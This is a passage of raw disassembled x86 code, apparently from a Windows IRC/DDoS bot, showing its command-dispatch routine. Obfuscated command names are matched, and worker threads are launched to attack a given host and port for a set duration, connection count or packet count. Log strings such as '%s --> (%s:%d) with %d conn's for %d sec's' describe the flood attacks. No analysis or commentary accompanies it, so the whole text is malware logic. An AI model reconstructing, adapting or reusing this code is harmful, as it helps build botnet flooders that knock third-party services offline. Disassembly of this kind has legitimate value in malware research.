mov [ebp+var_104C], eax
mov edi, offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
jl loc_413D77
cmp [ebp+arg_14], 0
jnz short loc_412087
cmp [ebp+arg_18], 0
jnz short loc_41208D
push dword ptr [ebx+8]
call sub_42A100
push eax
push dword ptr [ebx+4]
push edi
push offset aSSD_1 ; "%s --> (%s:%d)"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_412087: ; CODE XREF: sub_40A9FE+7661�j
cmp [ebp+arg_18], 0
jz short loc_4120AC
loc_41208D: ; CODE XREF: sub_40A9FE+7667�j
push dword ptr [ebx+8]
call sub_42A100
push eax
push dword ptr [ebx+4]
push edi
push offset aSSD_1 ; "%s --> (%s:%d)"
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 1Ch
loc_4120AC: ; CODE XREF: sub_40A9FE+768D�j
push dword ptr [ebx+8]
call sub_42A100
push eax
push dword ptr [ebx+4]
push edi
push offset aSSD_1 ; "%s --> (%s:%d)"
push 0Dh
call sub_4234A7
add esp, 18h
mov [ebp+var_1054], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_1158]
push edi
push eax
push offset sub_41EC9D
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_1054]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jnz short loc_412151
cmp [ebp+arg_14], 0
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_412132
cmp [ebp+arg_18], 0
jnz short loc_41213C
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_412132: ; CODE XREF: sub_40A9FE+7710�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_41213C: ; CODE XREF: sub_40A9FE+7716�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_411FD2
; ---------------------------------------------------------------------------
loc_412149: ; CODE XREF: sub_40A9FE+775A�j
push 32h
call dword_437190 ; Sleep
loc_412151: ; CODE XREF: sub_40A9FE+76FF�j
cmp [ebp+var_103C], 0
jz short loc_412149
jmp loc_414995
; ---------------------------------------------------------------------------
loc_41215F: ; CODE XREF: sub_40A9FE+7569�j
; sub_40A9FE+7572�j ...
mov edi, offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
jmp loc_40BF10
; ---------------------------------------------------------------------------
loc_412169: ; CODE XREF: sub_40A9FE+755E�j
push dword ptr [ebx]
push offset a4h4m_q_guy_ ; "4h4m/.Q.GUy."
call edi ; dword_437178
test eax, eax
jnz short loc_412180
push offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
jmp loc_4128A9
; ---------------------------------------------------------------------------
loc_412180: ; CODE XREF: sub_40A9FE+7776�j
push dword ptr [ebx]
push offset aX_62c_3ldcp ; "X.62C.3LDCP/"
call edi ; dword_437178
test eax, eax
jnz loc_4123B9
xor edi, edi
cmp [ebx+4], edi
jz loc_4123AF
cmp [ebx+8], edi
jz loc_4123AF
cmp [ebx+0Ch], edi
jz loc_4123AF
cmp [ebx+10h], edi
jz loc_4123AF
push 0Dh
call sub_423800
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_41220B
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_4121F3
cmp [ebp+arg_18], 0
jnz short loc_4121FD
push eax
push ebx
push offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_4121F3: ; CODE XREF: sub_40A9FE+77D7�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_4121FD: ; CODE XREF: sub_40A9FE+77DD�j
push [ebp+arg_C]
push ebx
loc_412201: ; CODE XREF: sub_40A9FE+7996�j
push offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_41220B: ; CODE XREF: sub_40A9FE+77C7�j
mov eax, [ebp+arg_14]
mov [ebp+var_1284], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1288], eax
cmp eax, edi
lea eax, [ebp+var_1318]
jnz short loc_41222C
push dword ptr [esi+0Ch]
jmp short loc_41222E
; ---------------------------------------------------------------------------
loc_41222C: ; CODE XREF: sub_40A9FE+7827�j
push dword ptr [esi]
loc_41222E: ; CODE XREF: sub_40A9FE+782C�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_139C], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1398]
push eax
call sub_429D10
push dword ptr [ebx+8]
call sub_42A100
mov [ebp+var_1294], eax
push dword ptr [ebx+0Ch]
call sub_42A100
mov [ebp+var_1290], eax
push dword ptr [ebx+10h]
call sub_42A100
add esp, 18h
cmp eax, 1
mov [ebp+var_128C], eax
mov edi, offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
jl loc_413D77
cmp [ebp+arg_14], 0
jnz short loc_4122C1
cmp [ebp+arg_18], 0
jnz short loc_4122C7
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSDForDSecS ; "%s --> (%s:%d) for %d sec's"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_4122C1: ; CODE XREF: sub_40A9FE+7890�j
cmp [ebp+arg_18], 0
jz short loc_4122F1
loc_4122C7: ; CODE XREF: sub_40A9FE+7896�j
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSDForDSecS ; "%s --> (%s:%d) for %d sec's"
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 1Ch
loc_4122F1: ; CODE XREF: sub_40A9FE+78C7�j
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSForDSecS ; "%s --> (%s) for %d sec's"
push 0Dh
call sub_4234A7
add esp, 18h
mov [ebp+var_1298], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_139C]
push edi
push eax
push offset sub_422A88
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_1298]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jnz short loc_4123A1
cmp [ebp+arg_14], 0
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_412382
cmp [ebp+arg_18], 0
jnz short loc_41238C
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_412382: ; CODE XREF: sub_40A9FE+7960�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_41238C: ; CODE XREF: sub_40A9FE+7966�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_412201
; ---------------------------------------------------------------------------
loc_412399: ; CODE XREF: sub_40A9FE+79AA�j
push 32h
call dword_437190 ; Sleep
loc_4123A1: ; CODE XREF: sub_40A9FE+794F�j
cmp [ebp+var_127C], 0
jz short loc_412399
jmp loc_414995
; ---------------------------------------------------------------------------
loc_4123AF: ; CODE XREF: sub_40A9FE+7798�j
; sub_40A9FE+77A1�j ...
mov edi, offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
jmp loc_40BF10
; ---------------------------------------------------------------------------
loc_4123B9: ; CODE XREF: sub_40A9FE+778D�j
push dword ptr [ebx]
push offset aWt4rnWgl6v_ ; "wt4Rn/WGL6V."
call edi ; dword_437178
test eax, eax
jnz short loc_4123D0
push offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
jmp loc_4128A9
; ---------------------------------------------------------------------------
loc_4123D0: ; CODE XREF: sub_40A9FE+79C6�j
push dword ptr [ebx]
push offset aW1w2v121jsp_ ; "w1w2V121JSP."
call edi ; dword_437178
test eax, eax
jnz loc_41255A
cmp [ebx+4], eax
jz loc_412691
cmp [ebx+8], eax
jz loc_412691
cmp [ebx+0Ch], eax
jz loc_412691
cmp [ebx+10h], eax
jz loc_412691
push 0Dh
call sub_423800
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jg loc_4125A7
mov edi, [ebp+arg_18]
lea eax, [ebp+var_FB4]
test edi, edi
jnz short loc_41242B
push dword ptr [esi+0Ch]
jmp short loc_41242D
; ---------------------------------------------------------------------------
loc_41242B: ; CODE XREF: sub_40A9FE+7A26�j
push dword ptr [esi]
loc_41242D: ; CODE XREF: sub_40A9FE+7A2B�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1038], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1034]
push eax
call sub_429D10
push dword ptr [ebx+8]
call sub_42A100
mov [ebp+var_F34], eax
push dword ptr [ebx+0Ch]
call sub_42A100
mov [ebp+var_F30], eax
push dword ptr [ebx+10h]
call sub_42A100
mov [ebp+var_F2C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_F24], edi
mov [ebp+var_F20], eax
push dword ptr [ebx+10h]
call sub_42A100
add esp, 1Ch
push eax
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
push offset aSSDWithDConnSF ; "%s --> (%s:%d) with %d conn's for %d se"...
push 0Dh
call sub_4234A7
add esp, 1Ch
mov [ebp+var_F28], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_1038]
push edi
push eax
push offset sub_418AD3
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_F28]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jnz short loc_41254C
loc_4124F5: ; CODE XREF: sub_40A9FE+7C75�j
cmp [ebp+arg_14], 0
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_412528
cmp [ebp+arg_18], 0
jnz short loc_412532
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_412528: ; CODE XREF: sub_40A9FE+7B06�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_412532: ; CODE XREF: sub_40A9FE+7B0C�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_412544: ; CODE XREF: sub_40A9FE+7B55�j
push 32h
call dword_437190 ; Sleep
loc_41254C: ; CODE XREF: sub_40A9FE+7AF5�j
cmp [ebp+var_F1C], 0
jz short loc_412544
jmp loc_414995
; ---------------------------------------------------------------------------
loc_41255A: ; CODE XREF: sub_40A9FE+79DD�j
push dword ptr [ebx]
push offset aVz62d1m0yya ; "Vz62d1m0Yya/"
call edi ; dword_437178
test eax, eax
jz loc_4126DE
push dword ptr [ebx]
push offset aF4c9z1ubcg80 ; "F4c9z1UBCg80"
call edi ; dword_437178
test eax, eax
jnz loc_4126D1
cmp [ebx+4], eax
jz loc_412691
cmp [ebx+8], eax
jz loc_412691
cmp [ebx+0Ch], eax
jz loc_412691
push 0Dh
call sub_423800
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_4125B1
loc_4125A7: ; CODE XREF: sub_40A9FE+7A15�j
mov ebx, offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
jmp loc_40B964
; ---------------------------------------------------------------------------
loc_4125B1: ; CODE XREF: sub_40A9FE+7BA7�j
mov edi, [ebp+arg_18]
lea eax, [ebp+var_18E4]
test edi, edi
jnz short loc_4125C3
push dword ptr [esi+0Ch]
jmp short loc_4125C5
; ---------------------------------------------------------------------------
loc_4125C3: ; CODE XREF: sub_40A9FE+7BBE�j
push dword ptr [esi]
loc_4125C5: ; CODE XREF: sub_40A9FE+7BC3�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1968], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1964]
push eax
call sub_429D10
push dword ptr [ebx+8]
call sub_42A100
mov [ebp+var_1860], eax
push dword ptr [ebx+0Ch]
call sub_42A100
mov [ebp+var_185C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_1858], edi
mov [ebp+var_1854], eax
push dword ptr [ebx+0Ch]
call sub_42A100
add esp, 18h
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
push offset aSSDWithDPacks ; "%s --> (%s:%d) with %d packs"
push 0Dh
call sub_4234A7
add esp, 18h
mov [ebp+var_1864], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_1968]
push edi
push eax
push offset sub_428A78
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_1864]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jz loc_4124F5
jmp short loc_412683
; ---------------------------------------------------------------------------
loc_41267B: ; CODE XREF: sub_40A9FE+7C8C�j
push 32h
call dword_437190 ; Sleep
loc_412683: ; CODE XREF: sub_40A9FE+7C7B�j
cmp [ebp+var_1850], 0
jz short loc_41267B
jmp loc_414995
; ---------------------------------------------------------------------------
loc_412691: ; CODE XREF: sub_40A9FE+79E6�j
; sub_40A9FE+79EF�j ...
cmp [ebp+arg_14], 0
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_4126BC
cmp [ebp+arg_18], 0
jnz short loc_4126C6
push ebx
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_4126BC: ; CODE XREF: sub_40A9FE+7CA1�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_4126C6: ; CODE XREF: sub_40A9FE+7CA7�j
push ebx
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
jmp loc_40C891
; ---------------------------------------------------------------------------
loc_4126D1: ; CODE XREF: sub_40A9FE+7B78�j
push dword ptr [ebx]
push offset a2yclo0srxpi ; "2YClO0SRxpi/"
call edi ; dword_437178
test eax, eax
jnz short loc_4126E8
loc_4126DE: ; CODE XREF: sub_40A9FE+7B67�j
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
jmp loc_4128A9
; ---------------------------------------------------------------------------
loc_4126E8: ; CODE XREF: sub_40A9FE+7CDE�j
push dword ptr [ebx]
push offset aH3yh9_xq_s2_ ; "h3YH9.Xq.S2."
call edi ; dword_437178
test eax, eax
jnz loc_412897
cmp [ebx+4], eax
jz loc_412857
cmp [ebx+8], eax
jz loc_412857
cmp [ebx+0Ch], eax
jz loc_412857
push 0Dh
call sub_423800
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_41272E
mov ebx, offset aSsoce0jbtxi ; "sSOce0JbTXI/"
jmp loc_40B964
; ---------------------------------------------------------------------------
loc_41272E: ; CODE XREF: sub_40A9FE+7D24�j
mov edi, [ebp+arg_18]
lea eax, [ebp+var_17C8]
test edi, edi
jnz short loc_412740
push dword ptr [esi+0Ch]
jmp short loc_412742
; ---------------------------------------------------------------------------
loc_412740: ; CODE XREF: sub_40A9FE+7D3B�j
push dword ptr [esi]
loc_412742: ; CODE XREF: sub_40A9FE+7D40�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_184C], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1848]
push eax
call sub_429D10
push dword ptr [ebx+8]
call sub_42A100
mov [ebp+var_1748], eax
push dword ptr [ebx+0Ch]
call sub_42A100
mov [ebp+var_1744], eax
mov eax, [ebp+arg_14]
mov [ebp+var_1738], edi
mov [ebp+var_1734], eax
push dword ptr [ebx+0Ch]
call sub_42A100
add esp, 18h
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aSsoce0jbtxi ; "sSOce0JbTXI/"
push offset aSSDWithDPacks ; "%s --> (%s:%d) with %d packs"
push 0Dh
call sub_4234A7
add esp, 18h
mov [ebp+var_173C], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_184C]
push edi
push eax
push offset sub_42757B
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_173C]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jnz short loc_412849
cmp [ebp+arg_14], 0
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_412825
cmp [ebp+arg_18], 0
jnz short loc_41282F
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aSsoce0jbtxi ; "sSOce0JbTXI/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_412825: ; CODE XREF: sub_40A9FE+7E03�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_41282F: ; CODE XREF: sub_40A9FE+7E09�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aSsoce0jbtxi ; "sSOce0JbTXI/"
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_412841: ; CODE XREF: sub_40A9FE+7E52�j
push 32h
call dword_437190 ; Sleep
loc_412849: ; CODE XREF: sub_40A9FE+7DF2�j
cmp [ebp+var_1730], 0
jz short loc_412841
jmp loc_414995
; ---------------------------------------------------------------------------
loc_412857: ; CODE XREF: sub_40A9FE+7CFE�j
; sub_40A9FE+7D07�j ...
cmp [ebp+arg_14], 0
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_412882
cmp [ebp+arg_18], 0
jnz short loc_41288C
push ebx
push offset aSsoce0jbtxi ; "sSOce0JbTXI/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_412882: ; CODE XREF: sub_40A9FE+7E67�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_41288C: ; CODE XREF: sub_40A9FE+7E6D�j
push ebx
push offset aSsoce0jbtxi ; "sSOce0JbTXI/"
jmp loc_40C891
; ---------------------------------------------------------------------------
loc_412897: ; CODE XREF: sub_40A9FE+7CF5�j
push dword ptr [ebx]
push offset aIwbkf0o1om6Qrn ; "IwBKf0O1Om6/QRn4z10ge1I1"
call edi ; dword_437178
test eax, eax
jnz short loc_4128B0
push offset aSsoce0jbtxi ; "sSOce0JbTXI/"
loc_4128A9: ; CODE XREF: sub_40A9FE+6BB2�j
; sub_40A9FE+6C0D�j ...
push 0Dh
jmp loc_412B29
; ---------------------------------------------------------------------------
loc_4128B0: ; CODE XREF: sub_40A9FE+7EA4�j
push dword ptr [ebx]
push offset aEm42x_1iszi1 ; "Em42x.1IsZI1"
call edi ; dword_437178
test eax, eax
jnz loc_412B15
xor edi, edi
cmp [ebx+4], edi
jz loc_412FC9
cmp [ebx+8], edi
jz loc_412FC9
cmp [ebx+0Ch], edi
jz loc_412FC9
cmp [ebx+10h], edi
jz loc_412FC9
cmp [ebx+14h], edi
jz loc_412FC9
push 0Eh
call sub_423800
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_412946
loc_412900: ; CODE XREF: sub_40A9FE+817F�j
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_41292E
cmp [ebp+arg_18], 0
jnz short loc_412938
push [ebp+arg_C]
push ebx
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_41292E: ; CODE XREF: sub_40A9FE+7F10�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_412938: ; CODE XREF: sub_40A9FE+7F16�j
push [ebp+arg_C]
push ebx
loc_41293C: ; CODE XREF: sub_40A9FE+80FC�j
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_412946: ; CODE XREF: sub_40A9FE+7F00�j
mov eax, [ebp+arg_14]
mov [ebp+var_63DC], eax
mov eax, [ebp+arg_18]
mov [ebp+var_63E0], eax
cmp eax, edi
lea eax, [ebp+var_6478]
jnz short loc_412967
push dword ptr [esi+0Ch]
jmp short loc_412969
; ---------------------------------------------------------------------------
loc_412967: ; CODE XREF: sub_40A9FE+7F62�j
push dword ptr [esi]
loc_412969: ; CODE XREF: sub_40A9FE+7F67�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
mov edi, 3FFh
push edi
mov [ebp+var_6C7C], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_6C78]
push eax
call sub_429D10
push dword ptr [ebx+8]
call sub_42A100
mov [ebp+var_63F4], eax
push dword ptr [ebx+0Ch]
call sub_42A100
mov [ebp+var_63F0], eax
push dword ptr [ebx+10h]
call sub_42A100
add esp, 18h
cmp eax, 1
mov [ebp+var_63E8], eax
jge short loc_4129CA
mov edi, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
jmp loc_413D77
; ---------------------------------------------------------------------------
loc_4129CA: ; CODE XREF: sub_40A9FE+7FC0�j
push edi
lea eax, [ebp+var_6878]
push dword ptr [ebx+14h]
push eax
call sub_429D10
xor eax, eax
add esp, 0Ch
cmp [ebp+arg_60], eax
mov edi, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
setnz al
cmp [ebp+arg_14], 0
mov [ebp+var_63E4], eax
jnz short loc_412A27
cmp [ebp+arg_18], 0
jnz short loc_412A2D
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSDDPackets_ ; "%s --> (%s:%d) %d packets."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_412A27: ; CODE XREF: sub_40A9FE+7FF6�j
cmp [ebp+arg_18], 0
jz short loc_412A57
loc_412A2D: ; CODE XREF: sub_40A9FE+7FFC�j
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSDDPackets_ ; "%s --> (%s:%d) %d packets."
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 1Ch
loc_412A57: ; CODE XREF: sub_40A9FE+802D�j
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSDDPackets_ ; "%s --> (%s:%d) %d packets."
push 0Eh
call sub_4234A7
add esp, 18h
mov [ebp+var_63F8], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_6C7C]
push edi
push eax
push offset loc_41A08B
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_63F8]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jnz short loc_412B07
loc_412AB5: ; CODE XREF: sub_40A9FE+8271�j
cmp [ebp+arg_14], 0
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_412AE8
cmp [ebp+arg_18], 0
jnz short loc_412AF2
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_412AE8: ; CODE XREF: sub_40A9FE+80C6�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_412AF2: ; CODE XREF: sub_40A9FE+80CC�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_41293C
; ---------------------------------------------------------------------------
loc_412AFF: ; CODE XREF: sub_40A9FE+8110�j
push 32h
call dword_437190 ; Sleep
loc_412B07: ; CODE XREF: sub_40A9FE+80B5�j
cmp [ebp+var_63D8], 0
jz short loc_412AFF
jmp loc_414995
; ---------------------------------------------------------------------------
loc_412B15: ; CODE XREF: sub_40A9FE+7EBD�j
push dword ptr [ebx]
push offset aErnniHm17t1qrn ; "ERNNi/HM17T1QRn4z10ge1I1"
call edi ; dword_437178
test eax, eax
jnz short loc_412B3E
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push 0Eh
loc_412B29: ; CODE XREF: sub_40A9FE+1096�j
; sub_40A9FE+189D�j ...
xor eax, eax
cmp [ebp+arg_18], eax
push eax
push [ebp+arg_20]
jnz loc_40BA99
push eax
jmp loc_412CA9
; ---------------------------------------------------------------------------
loc_412B3E: ; CODE XREF: sub_40A9FE+8122�j
push dword ptr [ebx]
push offset aKmdie1uwntq ; "KmdIe1UwntQ/"
call edi ; dword_437178
test eax, eax
jnz loc_412C8D
cmp [ebx+4], eax
jnz short loc_412B6F
cmp [ebp+arg_14], eax
mov edi, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz loc_40BF3A
cmp [ebp+arg_18], eax
jmp loc_40BF1F
; ---------------------------------------------------------------------------
loc_412B6F: ; CODE XREF: sub_40A9FE+8154�j
push 0Eh
call sub_423800
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jg loc_412900
mov eax, [ebp+arg_14]
mov [ebp+var_2644], eax
mov eax, [ebp+arg_18]
mov [ebp+var_2640], eax
test eax, eax
lea eax, [ebp+var_26C8]
jnz short loc_412BA4
push dword ptr [esi+0Ch]
jmp short loc_412BA6
; ---------------------------------------------------------------------------
loc_412BA4: ; CODE XREF: sub_40A9FE+819F�j
push dword ptr [esi]
loc_412BA6: ; CODE XREF: sub_40A9FE+81A4�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_27CC], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_27C8]
push eax
call sub_429D10
mov eax, [ebx+8]
add esp, 0Ch
test eax, eax
jz short loc_412BE3
push 7Fh
push eax
lea eax, [ebp+var_2748]
push eax
call sub_429D10
add esp, 0Ch
loc_412BE3: ; CODE XREF: sub_40A9FE+81D1�j
cmp [ebp+arg_14], 0
mov edi, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
jnz short loc_412C0B
cmp [ebp+arg_18], 0
jnz short loc_412C11
push dword ptr [ebx+4]
push edi
push offset aSS__0 ; "%s --> (%s)."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_412C0B: ; CODE XREF: sub_40A9FE+81EE�j
cmp [ebp+arg_18], 0
jz short loc_412C27
loc_412C11: ; CODE XREF: sub_40A9FE+81F4�j
push dword ptr [ebx+4]
push edi
push offset aSS__0 ; "%s --> (%s)."
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 14h
loc_412C27: ; CODE XREF: sub_40A9FE+8211�j
push dword ptr [ebx+4]
push edi
push offset aSS__0 ; "%s --> (%s)."
push 0Eh
call sub_4234A7
add esp, 10h
mov [ebp+var_2648], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_27CC]
push edi
push eax
push offset sub_428248
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_2648]
imul ecx, 2724h
